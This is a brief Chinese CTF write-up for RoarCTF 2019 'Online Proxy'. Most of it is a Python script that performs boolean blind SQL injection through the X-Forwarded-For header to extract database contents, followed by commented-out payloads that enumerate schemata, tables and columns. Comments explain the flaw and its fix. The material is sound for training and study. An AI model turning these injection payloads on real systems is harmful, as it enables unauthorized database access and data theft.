[RoarCTF 2019]Online Proxy

这题可还行。
进去看F12,有IP.
直到看了别人的博客才发现有注入。
重复前面的。会把再之前的写入,
执行Sql语句。
直接放exp了:

import requests
import time
# Boolean-based blind SQL injection extractor for the challenge above: the
# injection point is the X-Forwarded-For header, which the target evidently
# interpolates unescaped into a quoted SQL string (the payload closes the
# quote and re-opens it). The defender-side fix is a parameterised query and
# never treating a client-supplied proxy header as trusted input.
# Target base URL of the challenge instance.
url="http://node3.buuoj.cn:27440/"
# Request headers. requests sends every entry as a literal header, so the
# "GET" key goes out as a header *named* "GET" -- presumably a leftover from a
# raw-request template rather than something the server needs; verify before
# relying on it. "X-Forwarded-For" is overwritten with the probe value before
# each request in the loop below.
head={
    "GET" : "/ HTTP/1.1",
    "Cookie":"track_uuid=eddfa360-d3d7-46db-80f0-f42a7d51fa04",
    "X-Forwarded-For":""
}
# Characters recovered so far; one is appended per outer-loop iteration.
result=''
# Probe template: {0} is the 1-based character position, {1} the ASCII
# threshold the character is compared against.
urls ="0' or ascii(substr((select F4l9_C01uMn from F4l9_D4t4B45e.F4l9_t4b1e limit 1,1),{0},1))>{1} or '0"

# One character position per outer iteration. Starting at 21 looks like a
# resume point after an earlier partial run -- TODO confirm.
for i in range(21,100):
    # Binary search for the character's ASCII value over [1, 127].
    l=1
    r=127
    mid=(l+r)>>1
    while(l<r):
        # Per the writeup (the proxy stores the submitted value and evaluates
        # the previously stored one on a later request), the probe for `mid`
        # is sent first and the probe for `mid+1` is then sent twice; only the
        # last response is inspected. The exact server-side behaviour is
        # inferred from the writeup, not visible here.
        head["X-Forwarded-For"] = urls.format(i, mid)
        html_0=requests.post(url,headers=head)
        head["X-Forwarded-For"] = urls.format(i, mid+1)
        html_0 = requests.post(url, headers=head)
        html_0 = requests.post(url, headers=head)
        # "Last Ip: 1" in the page is taken to mean the injected condition was
        # true, i.e. the character's code is greater than mid.
        if "Last Ip: 1" in html_0.text:
            l=mid+1
        else:
            r=mid
        mid=(l+r)>>1
    # NOTE(review): chr() never returns '' (chr(0) is '\x00'), so this break
    # is unreachable. When the comparison is false for every threshold the
    # search converges on 1 and chr(1) is appended instead of stopping.
    if(chr(mid)==''):
            break
    result+=chr(mid)
    # Print progress after every character so a partial result survives an
    # interrupted run.
    print(result)
# NOTE(review): the label says "table_name" but the template above selects a
# column value, not a table name -- the message appears stale from an earlier
# enumeration step.
print("table_name:"+result)
# Templates from earlier enumeration steps, kept commented out for reference.
#urls ="0' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0"
#head["X-Forwarded-For"] = "0' or ascii(substr((select group_concat(schema_name) from information_schema.schemata),{0},1))>{1} or '0".format(i,mid)
#urls ="0' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0"
